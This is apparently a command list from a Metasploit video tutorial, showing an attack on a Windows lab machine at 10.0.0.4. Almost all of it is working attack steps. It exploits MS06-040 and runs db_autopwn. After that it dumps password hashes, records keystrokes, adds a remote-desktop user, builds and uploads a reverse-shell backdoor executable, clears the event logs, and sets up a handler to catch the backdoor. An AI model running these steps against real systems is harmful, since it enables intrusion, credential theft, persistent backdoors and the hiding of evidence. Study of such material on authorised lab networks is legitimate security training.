cd /pentest/exploits/framework3/
./msfconsole
db_create g0tmi1k
db_hosts
db_add_host 10.0.0.4
db_hosts
#show ##Show everything! [wasn't in video]
use windows/smb/ms06_040_netapi
#use windows/dcerpc/ms03_026_dcom ##Different exploit, didn't find it as reliable
#set payload windows/shell_bind_tcp ##Could do a windows shell (not as powerful as meterpreter)
#set payload windows/meterpreter/reverse_tcp ##Could do a meterpreter (but we do it later!)
set payload windows/vncinject/bind_tcp
show options
set lhost 10.0.0.6
show options
exploit
db_del_host 10.0.0.4
db_hosts
db_nmap -n 1O 10.0.0.1-5
db_hosts
db_autopwn -t -p -e
sessions -l
sessions -i 1
sysinfo
#ipconfig ##IP information [wasn't in video]
idletime
ps
kill [number]
getuid
#migrate // getsystem // use priv ##If the exploit doesn't have system privileges! [wasn't in video]
hashdump
# execute ## Runs a command [wasn't in video]
shell
pwd
ls
cd C:/
ls
mkdir g0tmi1k
ls
cd g0tmi1k
cat C:/boot.ini
download C:/boot.ini /tmp/boot.ini
./msfpayload windows/meterpreter/reverse_tcp lhost=10.0.0.6 X > /tmp/g0tmi1k.exe
upload /tmp/g0tmi1k.exe C:/g0tmi1k/g0tmi1k.exe
run getgui -u g0tmi1k -p haveyou
run keylogrecorder
## More scripts: /pentest/exploits/framework3/scripts/meterpreter
#run scraper ##Gets information about target, dumps reg etc [wasn't in video]
#run vnc ##Sets up VNC [wasn't in video]
#run uploadexec ##Upload and run a program [wasn't in video]
clearev
exit -y
exit -y
##Start fresh for the backdoor!
./msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.0.0.6
exploit
## Somehow run: C:\g0tmi1k\g0tmi1k.exe
Notes
Made a few slip-ups in the video and something went wrong with keylogrecorder.
This is only the basic stuff - it can do a lot more! See the commands for a few more basic things which I didn't do.